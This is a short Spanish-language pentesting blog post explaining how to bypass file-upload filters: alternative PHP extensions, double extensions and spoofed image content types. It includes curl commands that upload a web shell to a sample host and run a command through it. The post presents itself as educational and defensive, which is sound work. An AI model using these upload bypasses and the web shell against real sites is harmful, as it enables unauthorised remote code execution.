~ / blog / pentesting
KALI

Bypass de subida de archivos

Si una web deja subir archivos, intenta subir una shell.

Si filtra por extensión, la esquivas: extensiones alternativas de php como phtml, doble extensión, o falsear el tipo de contenido. Si filtra por el contenido, le añades una cabecera de imagen falsa al inicio de tu shell.

Una vez subida, la llamas desde el navegador y ejecutas comandos. Validar subidas solo por la extensión es una defensa de papel.

# los comandos

kali@kali:~$ # shell.php rechazado -> prueba shell.phtml / shell.php.jpgcopiar
kali@kali:~$ curl -F 'file=@shell.phtml;type=image/jpeg' http://10.0.0.5/uploadcopiar
Archivo subido: /uploads/shell.phtml
kali@kali:~$ curl 'http://10.0.0.5/uploads/shell.phtml?cmd=id'copiar
uid=33(www-data)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.